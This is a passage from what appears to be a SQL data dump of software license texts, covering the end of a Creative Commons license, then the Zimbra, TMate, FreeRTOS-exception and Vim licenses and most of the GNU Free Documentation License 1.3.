expenses, or damages. Where a limitation\nof liability is not allowed in full or in part, this limitation may not apply\nto You.\n\nc. The disclaimer of warranties and limitation of liability provided above\nshall be interpreted in a manner that, to the extent possible, most closely\napproximates an absolute disclaimer and waiver of all liability.\n\nSection 6 – Term and Termination.\n\na. This Public License applies for the term of the Copyright and Similar Rights\nlicensed here. However, if You fail to comply with this Public License, then\nYour rights under this Public License terminate automatically.\n\nb. Where Your right to use the Licensed Material has terminated under Section\n6(a), it reinstates:\n\n1. automatically as of the date the violation is cured, provided it is cured\nwithin 30 days of Your discovery of the violation; or\n\n 2. upon express reinstatement by the Licensor.\n\nc. For the avoidance of doubt, this Section 6(b) does not affect any right\nthe Licensor may have to seek remedies for Your violations of this Public\nLicense.\n\nd. For the avoidance of doubt, the Licensor may also offer the Licensed Material\nunder separate terms or conditions or stop distributing the Licensed Material\nat any time; however, doing so will not terminate this Public License.\n\n e. Sections 1, 5, 6, 7, and 8 survive termination of this Public License.\n\nSection 7 – Other Terms and Conditions.\n\na. The Licensor shall not be bound by any additional or different terms or\nconditions communicated by You unless expressly agreed.\n\nb. Any arrangements, understandings, or agreements regarding the Licensed\nMaterial not stated herein are separate from and independent of the terms\nand conditions of this Public License.\n\nSection 8 – Interpretation.\n\na. For the avoidance of doubt, this Public License does not, and shall not\nbe interpreted to, reduce, limit, restrict, or impose conditions on any use\nof the Licensed Material that could lawfully be made without permission under\nthis Public License.\n\nb. To the extent possible, if any provision of this Public License is deemed\nunenforceable, it shall be automatically reformed to the minimum extent necessary\nto make it enforceable. If the provision cannot be reformed, it shall be severed\nfrom this Public License without affecting the enforceability of the remaining\nterms and conditions.\n\nc. No term or condition of this Public License will be waived and no failure\nto comply consented to unless expressly agreed to by the Licensor.\n\nd. Nothing in this Public License constitutes or may be interpreted as a limitation\nupon, or waiver of, any privileges and immunities that apply to the Licensor\nor You, including from the legal processes of any jurisdiction or authority.\n\nCreative Commons is not a party to its public licenses. Notwithstanding, Creative\nCommons may elect to apply one of its public licenses to material it publishes\nand in those instances will be considered the \"Licensor.\" The text of the\nCreative Commons public licenses is dedicated to the public domain under the\nCC0 Public Domain Dedication. Except for the limited purpose of indicating\nthat material is shared under a Creative Commons public license or as otherwise\npermitted by the Creative Commons policies published at creativecommons.org/policies,\nCreative Commons does not authorize the use of the trademark \"Creative Commons\"\nor any other trademark or logo of Creative Commons without its prior written\nconsent including, without limitation, in connection with any unauthorized\nmodifications to any of its public licenses or any other arrangements, understandings,\nor agreements concerning use of licensed material. For the avoidance of doubt,\nthis paragraph does not form part of the public licenses.\n\nCreative Commons may be contacted at creativecommons.org.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(9,'Zimbra-1.4','Zimbra Public License, Version 1.4 (ZPL)\n\nThis Zimbra Public License (this \"Agreement\") is a legal agreement that describes\nthe terms under which Zimbra, Inc., a Texas corporation (\"Zimbra\") will provide\nsoftware to you via download or otherwise (\"Software\"). By using the Software,\nyou, an individual or an entity (\"You\") agree to the terms of this Agreement.\n\nIn consideration of the mutual promises and upon the terms and conditions\nset forth below, the parties agree as follows:\n\n 1. Grant of Copyright License\n\n1.1 - Subject to the terms and conditions of this Agreement, Zimbra hereby\ngrants to You, under any and all of its copyright interest in and to the Software,\na royalty-free, non-exclusive, non-transferable license to copy, modify, compile,\nexecute, and distribute the Software and Modifications. For the purposes of\nthis Agreement, any change to, addition to, or abridgement of the Software\nmade by You is a \"Modification;\" however, any file You add to the Software\nthat does not contain any part of the Software is not a \"Modification.\"\n\n1.2 - If You are an individual acting on behalf of a corporation or other\nentity, Your use of the Software or any Modification is subject to Your having\nthe authority to bind such corporation or entity to this Agreement. Providing\ncopies to persons within such corporation or entity is not considered distribution\nfor purposes of this Agreement.\n\n1.3 - For the Software or any Modification You distribute in source code format,\nYou must do so only under the terms of this Agreement, and You must include\na complete copy of this Agreement with Your distribution. With respect to\nany Modification You distribute in source code format, the terms of this Agreement\nwill apply to You in the same way those terms apply to Zimbra with respect\nto the Software. In other words, when You are distributing Modifications under\nthis Agreement, You \"stand in the shoes\" of Zimbra in terms of the rights\nYou grant and how the terms and conditions apply to You and the licensees\nof Your Modifications. Notwithstanding the foregoing, when You \"stand in the\nshoes\" of Zimbra, You are not subject to the jurisdiction provision under\nSection 7, which requires all disputes under this Agreement to be subject\nto the jurisdiction of federal or state courts of Northern Texas.\n\n1.4 - For the Software or any Modification You distribute in compiled or object\ncode format, You must also provide recipients with access to the Software\nor Modification in source code format along with a complete copy of this Agreement.\nThe distribution of the Software or Modifications in compiled or object code\nformat may be under a license of Your choice, provided that You are in compliance\nwith the terms of this Agreement. In addition, You must make absolutely clear\nthat any license terms applying to such Software or Modification that differ\nfrom this Agreement are offered by You alone and not by Zimbra, and that such\nlicense does not restrict recipients from exercising rights in the source\ncode to the Software granted by Zimbra under this Agreement or rights in the\nsource code to any Modification granted by You as described in Section 1.3.\n\n1.5 - This Agreement does not limit Your right to distribute files that are\nentirely Your own work (i.e., which do not incorporate any portion of the\nSoftware and are not Modifications) under any terms You choose.\n\n 2. Support\n\nZimbra has no obligation to provide technical support or updates to You. Nothing\nin this Agreement requires Zimbra to enter into any license with You for any\nother edition of the Software.\n\n 3. Intellectual Property Rights\n\n3.1 - Except for the license expressly granted under copyright in Section\n1.1, no rights, licenses or forbearances are granted or may arise in relation\nto this Agreement whether expressly, by implication, exhaustion, estoppel\nor otherwise. All rights, including all intellectual property rights, that\nare not expressly granted under this Agreement are hereby reserved.\n\n3.2 - In any copy of the Software or in any Modification you create, You must\nretain and reproduce any and all copyright, patent, trademark, and attribution\nnotices that are included in the Software in the same form as they appear\nin the Software. This includes the preservation of attribution notices in\nthe form of trademarks or logos that exist within a user interface of the\nSoftware.\n\n3.3 - This license does not grant You rights to use any party\'s name, logo,\nor trademarks, except solely as necessary to comply with Section 3.2.\n\n 4. Disclaimer of Warranties\n\nTHE SOFTWARE IS PROVIDED \"AS IS\" AND WITHOUT WARRANTY OF ANY KIND. ZIMBRA\nMAKES NO WARRANTIES, WHETHER EXPRESS, IMPLIED, OR STATUTORY, REGARDING OR\nRELATING TO THE SOFTWARE. SPECIFICALLY, ZIMBRA DOES NOT WARRANT THAT THE SOFTWARE\nWILL BE ERROR FREE OR WILL PERFORM IN AN UNINTERRUPTED MANNER. TO THE GREATEST\nEXTENT ALLOWED BY LAW, ZIMBRA SPECIFICALLY DISCLAIMS ALL IMPLIED WARRANTIES\nOF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE (EVEN IF ZIMBRA HAD BEEN\nINFORMED OF SUCH PURPOSE), AND NONINFRINGEMENT WITH RESPECT TO THE SOFTWARE,\nANY MODIFICATIONS THERETO, AND WITH RESPECT TO THE USE OF THE FOREGOING.\n\n 5. Limitation of Liability\n\nIN NO EVENT WILL ZIMBRA BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\nEXEMPLARY, OR CONSEQUENTIAL DAMAGES OF ANY KIND (INCLUDING WITHOUT LIMITATION\nLOSS OF PROFITS, LOSS OF USE, BUSINESS INTERRUPTION, LOSS OF DATA, AND COST\nOF COVER) IN CONNECTION WITH OR ARISING OUT OF OR RELATING TO THE FURNISHING,\nPERFORMANCE, OR USE OF THE SOFTWARE OR ANY OTHER RIGHTS GRANTED HEREUNDER,\nWHETHER ALLEGED AS A BREACH OF CONTRACT OR TORTIOUS CONDUCT, INCLUDING NEGLIGENCE,\nAND EVEN IF ZIMBRA HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.\n\n 6. Term and Termination\n\n6.1 - This Agreement will continue in effect unless and until terminated earlier\npursuant to this Section 6.\n\n6.2 - In the event You violate the terms of this Agreement, Zimbra may terminate\nthis Agreement.\n\n6.3 - All licenses granted hereunder shall terminate upon the termination\nof this Agreement. Termination will be in addition to any rights and remedies\navailable to Zimbra at law or equity or under this Agreement.\n\n6.4 - Termination of this Agreement will not affect the provisions regarding\nreservation of rights (Section 3.1), provisions disclaiming or limiting Zimbra\'s\nliability (Sections 4 and 5), Termination (Section 6), or Miscellaneous (Section\n7), which provisions will survive termination of this Agreement.\n\n 7. Miscellaneous\n\nThis Agreement contains the entire agreement of the parties with respect to\nthe subject matter of this Agreement and supersedes all previous communications,\nrepresentations, understandings, and agreements, either oral or written, between\nthe parties with respect to said subject matter. The relationship of the parties\nhereunder is that of independent contractors, and this Agreement will not\nbe construed as creating an agency, partnership, joint venture, or any other\nform of legal association between the parties. If any term, condition, or\nprovision in this Agreement is found to be invalid, unlawful, or unenforceable\nto any extent, this Agreement will be construed in a manner that most closely\neffectuates the intent of this Agreement. Such invalid term, condition or\nprovision will be severed from the remaining terms, conditions, and provisions,\nwhich will continue to be valid and enforceable to the fullest extent permitted\nby law. This Agreement will be interpreted and construed in accordance with\nthe laws of the State of Delaware and the United States of America, without\nregard to conflict of law principles. The U.N. Convention on Contracts for\nthe International Sale of Goods shall not apply to this Agreement. All disputes\narising out of this Agreement involving Zimbra or any of its parents or subsidiaries\nshall be subject to the jurisdiction of the federal or state courts of Northern\nTexas, with venue lying in Dallas County, Texas. No rights may be assigned,\nno obligations may be delegated, and this Agreement may not be transferred\nby You, in whole or in part, whether voluntary or by operation of law, including\nby way of sale of assets, merger, or consolidation, without the prior written\nconsent of Zimbra, and any purported assignment, delegation, or transfer without\nsuch consent shall be void ab initio. Any waiver of the provisions of this\nAgreement or of a party\'s rights or remedies under this Agreement must be\nin writing to be effective. Failure, neglect, or delay by a party to enforce\nthe provisions of this Agreement or its rights or remedies at any time will\nnot be construed or be deemed to be a waiver of such party\'s rights under\nthis Agreement and will not in any way affect the validity of the whole or\nany part of this Agreement or prejudice such party\'s right to take subsequent\naction.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(10,'TMate','The TMate Open Source License. This license applies to all portions of TMate\nSVNKit library, which are not externally-maintained libraries (e.g. Ganymed\nSSH library).\n\nAll the source code and compiled classes in package org.tigris.subversion.javahl\nexcept SvnClient class are covered by the license in JAVAHL-LICENSE file\n\nCopyright (c) 2004-2012 TMate Software. All rights reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n* Redistributions of source code must retain the above copyright notice, this\nlist of conditions and the following disclaimer.\n\n* Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n* Redistributions in any form must be accompanied by information on how to\nobtain complete source code for the software that uses SVNKit and any accompanying\nsoftware that uses the software that uses SVNKit. The source code must either\nbe included in the distribution or be available for no more than the cost\nof distribution plus a nominal fee, and must be freely redistributable under\nreasonable conditions. For an executable file, complete source code means\nthe source code for all modules it contains. It does not include source code\nfor modules or files that typically accompany the major components of the\noperating system on which the executable file runs.\n\n* Redistribution in any form without redistributing source code for software\nthat uses SVNKit is possible only when such redistribution is explictly permitted\nby TMate Software. Please, contact TMate Software at support@svnkit.com to\nget such permission.\n\nTHIS SOFTWARE IS PROVIDED BY TMATE SOFTWARE ``AS IS\'\' AND ANY EXPRESS OR IMPLIED\nWARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE, OR NON-INFRINGEMENT, ARE DISCLAIMED.\n\nIN NO EVENT SHALL TMATE SOFTWARE BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\nSPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\nPROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\nOR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER\nIN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\nARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\nPOSSIBILITY OF SUCH DAMAGE.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(11,'freertos-exception-2.0','Any FreeRTOS source code, whether modified or in its original release form, or whether in whole or in part, can only be distributed by you under the terms of the GNU General Public License plus this exception. An independent module is a module which is not derived from or based on FreeRTOS.\n\nEXCEPTION TEXT:\n\n \n\n Clause 1\n\n Linking FreeRTOS statically or dynamically with other modules is making a combined work based on FreeRTOS. Thus, the terms and conditions of the GNU General Public License cover the whole combination.\n\n As a special exception, the copyright holder of FreeRTOS gives you permission to link FreeRTOS with independent modules that communicate with FreeRTOS solely through the FreeRTOS API interface, regardless of the license terms of these independent modules, and to copy and distribute the resulting combined work under terms of your choice, provided that\n\n + Every copy of the combined work is accompanied by a written statement that details to the recipient the version of FreeRTOS used and an offer by yourself to provide the FreeRTOS source code (including any modifications you may have made) should the recipient request it.\n\n + The combined work is not itself an RTOS, scheduler, kernel or related product.\n\n + The independent modules add significant and primary functionality to FreeRTOS and do not merely extend the existing functionality already present in FreeRTOS.\n\n \n\n Clause 2\n\n FreeRTOS may not be used for any competitive or comparative purpose, including the publication of any form of run time or compile time metric, without the express permission of Real Time Engineers Ltd. (this is the norm within the industry and is intended to ensure information accuracy).\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(12,'Vim','VIM LICENSE\n\nI) There are no restrictions on distributing unmodified copies of Vim except\nthat they must include this license text. You can also distribute unmodified\nparts of Vim, likewise unrestricted except that they must include this license\ntext. You are also allowed to include executables that you made from the unmodified\nVim sources, plus your own usage examples and Vim scripts.\n\nII) It is allowed to distribute a modified (or extended) version of Vim, including\nexecutables and/or source code, when the following four conditions are met:\n\n 1) This license text must be included unmodified.\n\n2) The modified Vim must be distributed in one of the following five ways:\n\na) If you make changes to Vim yourself, you must clearly describe in the distribution\nhow to contact you. When the maintainer asks you (in any way) for a copy of\nthe modified Vim you distributed, you must make your changes, including source\ncode, available to the maintainer without fee. The maintainer reserves the\nright to include your changes in the official version of Vim. What the maintainer\nwill do with your changes and under what license they will be distributed\nis negotiable. If there has been no negotiation then this license, or a later\nversion, also applies to your changes. The current maintainer is Bram Moolenaar\n<Bram@vim.org>. If this changes it will be announced in appropriate places\n(most likely vim.sf.net, www.vim.org and/or comp.editors). When it is completely\nimpossible to contact the maintainer, the obligation to send him your changes\nceases. Once the maintainer has confirmed that he has received your changes\nthey will not have to be sent again.\n\nb) If you have received a modified Vim that was distributed as mentioned under\na) you are allowed to further distribute it unmodified, as mentioned at I).\nIf you make additional changes the text under a) applies to those changes.\n\nc) Provide all the changes, including source code, with every copy of the\nmodified Vim you distribute. This may be done in the form of a context diff.\nYou can choose what license to use for new code you add. The changes and their\nlicense must not restrict others from making their own changes to the official\nversion of Vim.\n\nd) When you have a modified Vim which includes changes as mentioned under\nc), you can distribute it without the source code for the changes if the following\nthree conditions are met:\n\n- The license that applies to the changes permits you to distribute the changes\nto the Vim maintainer without fee or restriction, and permits the Vim maintainer\nto include the changes in the official version of Vim without fee or restriction.\n\n- You keep the changes for at least three years after last distributing the\ncorresponding modified Vim. When the maintainer or someone who you distributed\nthe modified Vim to asks you (in any way) for the changes within this period,\nyou must make them available to him.\n\n- You clearly describe in the distribution how to contact you. This contact\ninformation must remain valid for at least three years after last distributing\nthe corresponding modified Vim, or as long as possible.\n\ne) When the GNU General Public License (GPL) applies to the changes, you can\ndistribute the modified Vim under the GNU GPL version 2 or any later version.\n\n3) A message must be added, at least in the output of the \":version\" command\nand in the intro screen, such that the user of the modified Vim is able to\nsee that it was modified. When distributing as mentioned under 2)e) adding\nthe message is only required for as far as this does not conflict with the\nlicense used for the changes.\n\n4) The contact information as required under 2)a) and 2)d) must not be removed\nor changed, except that the person himself can make corrections.\n\nIII) If you distribute a modified version of Vim, you are encouraged to use\nthe Vim license for your changes and make them available to the maintainer,\nincluding the source code. The preferred way to do this is by e-mail or by\nuploading the files to a server and e-mailing the URL. If the number of changes\nis small (e.g., a modified Makefile) e-mailing a context diff will do. The\ne-mail address to be used is <maintainer@vim.org>\n\nIV) It is not allowed to remove this license from the distribution of the\nVim sources, parts of it or from a modified version. You may use this license\nfor previous Vim releases instead of the license that they came with, at your\noption.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(13,'GFDL-1.3-or-later','GNU Free Documentation License\n\nVersion 1.3, 3 November 2008\n\nCopyright (C) 2000, 2001, 2002, 2007, 2008 Free Software Foundation, Inc.\n<http://fsf.org/>\n\nEveryone is permitted to copy and distribute verbatim copies of this license\ndocument, but changing it is not allowed.\n\n 0. PREAMBLE\n\nThe purpose of this License is to make a manual, textbook, or other functional\nand useful document \"free\" in the sense of freedom: to assure everyone the\neffective freedom to copy and redistribute it, with or without modifying it,\neither commercially or noncommercially. Secondarily, this License preserves\nfor the author and publisher a way to get credit for their work, while not\nbeing considered responsible for modifications made by others.\n\nThis License is a kind of \"copyleft\", which means that derivative works of\nthe document must themselves be free in the same sense. It complements the\nGNU General Public License, which is a copyleft license designed for free\nsoftware.\n\nWe have designed this License in order to use it for manuals for free software,\nbecause free software needs free documentation: a free program should come\nwith manuals providing the same freedoms that the software does. But this\nLicense is not limited to software manuals; it can be used for any textual\nwork, regardless of subject matter or whether it is published as a printed\nbook. We recommend this License principally for works whose purpose is instruction\nor reference.\n\n 1. APPLICABILITY AND DEFINITIONS\n\nThis License applies to any manual or other work, in any medium, that contains\na notice placed by the copyright holder saying it can be distributed under\nthe terms of this License. Such a notice grants a world-wide, royalty-free\nlicense, unlimited in duration, to use that work under the conditions stated\nherein. The \"Document\", below, refers to any such manual or work. Any member\nof the public is a licensee, and is addressed as \"you\". You accept the license\nif you copy, modify or distribute the work in a way requiring permission under\ncopyright law.\n\nA \"Modified Version\" of the Document means any work containing the Document\nor a portion of it, either copied verbatim, or with modifications and/or translated\ninto another language.\n\nA \"Secondary Section\" is a named appendix or a front-matter section of the\nDocument that deals exclusively with the relationship of the publishers or\nauthors of the Document to the Document\'s overall subject (or to related matters)\nand contains nothing that could fall directly within that overall subject.\n(Thus, if the Document is in part a textbook of mathematics, a Secondary Section\nmay not explain any mathematics.) The relationship could be a matter of historical\nconnection with the subject or with related matters, or of legal, commercial,\nphilosophical, ethical or political position regarding them.\n\nThe \"Invariant Sections\" are certain Secondary Sections whose titles are designated,\nas being those of Invariant Sections, in the notice that says that the Document\nis released under this License. If a section does not fit the above definition\nof Secondary then it is not allowed to be designated as Invariant. The Document\nmay contain zero Invariant Sections. If the Document does not identify any\nInvariant Sections then there are none.\n\nThe \"Cover Texts\" are certain short passages of text that are listed, as Front-Cover\nTexts or Back-Cover Texts, in the notice that says that the Document is released\nunder this License. A Front-Cover Text may be at most 5 words, and a Back-Cover\nText may be at most 25 words.\n\nA \"Transparent\" copy of the Document means a machine-readable copy, represented\nin a format whose specification is available to the general public, that is\nsuitable for revising the document straightforwardly with generic text editors\nor (for images composed of pixels) generic paint programs or (for drawings)\nsome widely available drawing editor, and that is suitable for input to text\nformatters or for automatic translation to a variety of formats suitable for\ninput to text formatters. A copy made in an otherwise Transparent file format\nwhose markup, or absence of markup, has been arranged to thwart or discourage\nsubsequent modification by readers is not Transparent. An image format is\nnot Transparent if used for any substantial amount of text. A copy that is\nnot \"Transparent\" is called \"Opaque\".\n\nExamples of suitable formats for Transparent copies include plain ASCII without\nmarkup, Texinfo input format, LaTeX input format, SGML or XML using a publicly\navailable DTD, and standard-conforming simple HTML, PostScript or PDF designed\nfor human modification. Examples of transparent image formats include PNG,\nXCF and JPG. Opaque formats include proprietary formats that can be read and\nedited only by proprietary word processors, SGML or XML for which the DTD\nand/or processing tools are not generally available, and the machine-generated\nHTML, PostScript or PDF produced by some word processors for output purposes\nonly.\n\nThe \"Title Page\" means, for a printed book, the title page itself, plus such\nfollowing pages as are needed to hold, legibly, the material this License\nrequires to appear in the title page. For works in formats which do not have\nany title page as such, \"Title Page\" means the text near the most prominent\nappearance of the work\'s title, preceding the beginning of the body of the\ntext.\n\nThe \"publisher\" means any person or entity that distributes copies of the\nDocument to the public.\n\nA section \"Entitled XYZ\" means a named subunit of the Document whose title\neither is precisely XYZ or contains XYZ in parentheses following text that\ntranslates XYZ in another language. (Here XYZ stands for a specific section\nname mentioned below, such as \"Acknowledgements\", \"Dedications\", \"Endorsements\",\nor \"History\".) To \"Preserve the Title\" of such a section when you modify the\nDocument means that it remains a section \"Entitled XYZ\" according to this\ndefinition.\n\nThe Document may include Warranty Disclaimers next to the notice which states\nthat this License applies to the Document. These Warranty Disclaimers are\nconsidered to be included by reference in this License, but only as regards\ndisclaiming warranties: any other implication that these Warranty Disclaimers\nmay have is void and has no effect on the meaning of this License.\n\n 2. VERBATIM COPYING\n\nYou may copy and distribute the Document in any medium, either commercially\nor noncommercially, provided that this License, the copyright notices, and\nthe license notice saying this License applies to the Document are reproduced\nin all copies, and that you add no other conditions whatsoever to those of\nthis License. You may not use technical measures to obstruct or control the\nreading or further copying of the copies you make or distribute. However,\nyou may accept compensation in exchange for copies. If you distribute a large\nenough number of copies you must also follow the conditions in section 3.\n\nYou may also lend copies, under the same conditions stated above, and you\nmay publicly display copies.\n\n 3. COPYING IN QUANTITY\n\nIf you publish printed copies (or copies in media that commonly have printed\ncovers) of the Document, numbering more than 100, and the Document\'s license\nnotice requires Cover Texts, you must enclose the copies in covers that carry,\nclearly and legibly, all these Cover Texts: Front-Cover Texts on the front\ncover, and Back-Cover Texts on the back cover. Both covers must also clearly\nand legibly identify you as the publisher of these copies. The front cover\nmust present the full title with all words of the title equally prominent\nand visible. You may add other material on the covers in addition. Copying\nwith changes limited to the covers, as long as they preserve the title of\nthe Document and satisfy these conditions, can be treated as verbatim copying\nin other respects.\n\nIf the required texts for either cover are too voluminous to fit legibly,\nyou should put the first ones listed (as many as fit reasonably) on the actual\ncover, and continue the rest onto adjacent pages.\n\nIf you publish or distribute Opaque copies of the Document numbering more\nthan 100, you must either include a machine-readable Transparent copy along\nwith each Opaque copy, or state in or with each Opaque copy a computer-network\nlocation from which the general network-using public has access to download\nusing public-standard network protocols a complete Transparent copy of the\nDocument, free of added material. If you use the latter option, you must take\nreasonably prudent steps, when you begin distribution of Opaque copies in\nquantity, to ensure that this Transparent copy will remain thus accessible\nat the stated location until at least one year after the last time you distribute\nan Opaque copy (directly or through your agents or retailers) of that edition\nto the public.\n\nIt is requested, but not required, that you contact the authors of the Document\nwell before redistributing any large number of copies, to give them a chance\nto provide you with an updated version of the Document.\n\n 4. MODIFICATIONS\n\nYou may copy and distribute a Modified Version of the Document under the conditions\nof sections 2 and 3 above, provided that you release the Modified Version\nunder precisely this License, with the Modified Version filling the role of\nthe Document, thus licensing distribution and modification of the Modified\nVersion to whoever possesses a copy of it. In addition, you must do these\nthings in the Modified Version:\n\nA. Use in the Title Page (and on the covers, if any) a title distinct from\nthat of the Document, and from those of previous versions (which should, if\nthere were any, be listed in the History section of the Document). You may\nuse the same title as a previous version if the original publisher of that\nversion gives permission.\n\nB. List on the Title Page, as authors, one or more persons or entities responsible\nfor authorship of the modifications in the Modified Version, together with\nat least five of the principal authors of the Document (all of its principal\nauthors, if it has fewer than five), unless they release you from this requirement.\n\nC. State on the Title page the name of the publisher of the Modified Version,\nas the publisher.\n\n D. Preserve all the copyright notices of the Document.\n\nE. Add an appropriate copyright notice for your modifications adjacent to\nthe other copyright notices.\n\nF. Include, immediately after the copyright notices, a license notice giving\nthe public permission to use the Modified Version under the terms of this\nLicense, in the form shown in the Addendum below.\n\nG. Preserve in that license notice the full lists of Invariant Sections and\nrequired Cover Texts given in the Document\'s license notice. H. Include an\nunaltered copy of this License.\n\nI. Preserve the section Entitled \"History\", Preserve its Title, and add to\nit an item stating at least the title, year, new authors, and publisher of\nthe Modified Version as given on the Title Page. If there is no section Entitled\n\"History\" in the Document, create one stating the title, year, authors, and\npublisher of the Document as given on its Title Page, then add an item describing\nthe Modified Version as stated in the previous sentence.\n\nJ. Preserve the network location, if any, given in the Document for public\naccess to a Transparent copy of the Document, and likewise the network locations\ngiven in the Document for previous versions it was based on. These may be\nplaced in the \"History\" section. You may omit a network location for a work\nthat was published at least four years before the Document itself, or if the\noriginal publisher of the version it refers to gives permission.\n\nK. For any section Entitled \"Acknowledgements\" or \"Dedications\", Preserve\nthe Title of the section, and preserve in the section all the substance and\ntone of each of the contributor acknowledgements and/or dedications given\ntherein.\n\nL. Preserve all the Invariant Sections of the Document, unaltered in their\ntext and in their titles. Section numbers or the equivalent are not considered\npart of the section titles.\n\nM. Delete any section Entitled \"Endorsements\". Such a section may not be included\nin the Modified Version.\n\nN. Do not retitle any existing section to be Entitled \"Endorsements\" or to\nconflict in title with any Invariant Section.\n\n O. Preserve any Warranty Disclaimers.\n\nIf the Modified Version includes new front-matter sections or appendices that\nqualify as Secondary Sections and contain no material copied from the Document,\nyou may at your option designate some or all of these sections as invariant.\nTo do this, add their titles to the list of Invariant Sections in the Modified\nVersion\'s license notice. These titles must be distinct from any other section\ntitles.\n\nYou may add a section Entitled \"Endorsements\", provided it contains nothing\nbut endorsements of your Modified Version by various parties--for example,\nstatements of peer review or that the text has been approved by an organization\nas the authoritative definition of a standard.\n\nYou may add a passage of up to five words as a Front-Cover Text, and a passage\nof up to 25 words as a Back-Cover Text, to the end of the list of Cover Texts\nin the Modified Version. Only one passage of Front-Cover Text and one of Back-Cover\nText may be added by (or through arrangements made by) any one entity. If\nthe Document already includes a cover text for the same cover, previously\nadded by you or by arrangement made by the same entity you are acting on behalf\nof, you may not add another; but you may replace the old one, on explicit\npermission from the previous publisher that added the old one.\n\nThe author(s) and publisher(s) of the Document do not by this License give\npermission to use their names for publicity for or to assert or imply endorsement\nof any Modified Version.\n\n 5. COMBINING DOCUMENTS\n\nYou may combine the Document with other documents released under this License,\nunder the terms defined in section 4 above for modified versions, provided\nthat you include in the combination all of the Invariant Sections of all of\nthe original documents, unmodified, and list them all as Invariant Sections\nof your combined work in its license notice, and that you preserve all their\nWarranty Disclaimers.\n\nThe combined work need only contain one copy of this License, and multiple\nidentical Invariant Sections may be replaced with a single copy. If there\nare multiple Invariant Sections with the same name but different contents,\nmake the title of each such section unique by adding at the end of it, in\nparentheses, the name of the original author or publisher of that section\nif known, or else a unique number. Make the same adjustment to the section\ntitles in the list of Invariant Sections in the license notice of the combined\nwork.\n\nIn the combination, you must combine any sections Entitled \"History\" in the\nvarious original documents, forming one section Entitled \"History\"; likewise\ncombine any sections Entitled \"Acknowledgements\", and any sections Entitled\n\"Dedications\". You must delete all sections Entitled \"Endorsements\".\n\n 6. COLLECTIONS OF DOCUMENTS\n\nYou may make a collection consisting of the Document and other documents released\nunder this License, and replace the individual copies of this License in the\nvarious documents with a single copy that is included in the collection, provided\nthat you follow the rules of this License for verbatim copying of each of\nthe documents in all other respects.\n\nYou may extract a single document from such a collection, and distribute it\nindividually under this License, provided you insert a copy of this License\ninto the extracted document, and follow this License in all other respects\nregarding verbatim copying of that document.\n\n 7. AGGREGATION WITH INDEPENDENT WORKS\n\nA compilation of the Document or its derivatives with other separate and independent\ndocuments or works, in or on a volume of a storage or distribution medium,\nis called an \"aggregate\" if the copyright resulting from the compilation is\nnot used to limit the legal rights of the compilation\'s users beyond what\nthe individual works permit. When the Document is included in an aggregate,\nthis License does not apply to the other works in the aggregate which are\nnot themselves derivative works of the Document.\n\nIf the Cover Text requirement of section 3 is applicable to these copies of\nthe Document, then if the Document is less than one half of the entire aggregate,\nthe Document\'s Cover Texts may be placed on covers that bracket the Document\nwithin the aggregate, or the electronic equivalent of covers if the Document\nis in electronic form. Otherwise they must appear on printed covers that bracket\nthe whole aggregate.\n\n 8. TRANSLATION\n\nTranslation is considered a kind of modification, so you may distribute translations\nof the Document under the terms of section 4. Replacing Invariant Sections\nwith translations requires special permission from their copyright holders,\nbut you may include translations of some or all Invariant Sections in addition\nto the original versions of these Invariant Sections. You may include a translation\nof this License, and all the license notices in the Document, and any Warranty\nDisclaimers, provided that you also include the original English version of\nthis License and the original versions of those notices and disclaimers. In\ncase of a disagreement between the translation and the original version of\nthis License or a notice or disclaimer, the original version will prevail.\n\nIf a section in the Document is Entitled \"Acknowledgements\", \"Dedications\",\nor \"History\", the requirement (section 4) to Preserve its Title (section 1)\nwill typically require changing the actual title.\n\n 9. TERMINATION\n\nYou may not copy, modify, sublicense, or distribute the Document except as\nexpressly provided under this License. Any attempt otherwise to copy, modify,\nsublicense, or distribute it is void, and will automatically terminate your\nrights under this License.\n\nHowever, if you cease all violation of this License, then your license from\na particular copyright holder is reinstated (a) provisionally, unless and\nuntil the copyright holder explicitly and finally terminates your license,\nand (b) permanently, if the copyright holder fails to notify you of the violation\nby some reasonable means prior to 60 days after the cessation.\n\nMoreover, your license from a particular copyright holder is reinstated permanently\nif the copyright holder notifies you of the violation by some reasonable means,\nthis is the first time you have received notice of violation of this License\n(for any work) from that copyright holder, and you cure the violation prior\nto 30 days after your receipt of the notice.\n\nTermination of your rights under this section does not terminate the licenses\nof parties who have received copies or rights from you under this License.\nIf your rights have been terminated and not permanently reinstated, receipt\nof a copy of some or all of the same material does not give you any rights\nto use it.\n\n 10. FUTURE REVISIONS OF THIS LICENSE\n\nThe Free Software Foundation may publish new, revised versions of the GNU\nFree Documentation License from time to time. Such new versions will be similar\nin spirit to the present version, but may differ in detail to address new\nproblems or concerns. See http://www.gnu.org/copyleft/.\n\nEach version of the License is given a distinguishing version number. If the\nDocument specifies that a particular numbered version of this License \"or\nany later version\" applies to it, you have the option of following the terms\nand conditions either of that specified version or of any later version that\nhas been published (not as a draft) by the Free Software Foundation. If the\nDocument does not specify a version number of this License, you may choose\nany version ever published (not as a draft) by the Free Software Foundation.\nIf the Document specifies that a proxy can decide which future versions of\nthis License can be used, that proxy\'s public statement of acceptance of a\nversion permanently authorizes you to choose that version for the Document.\n\n 11. 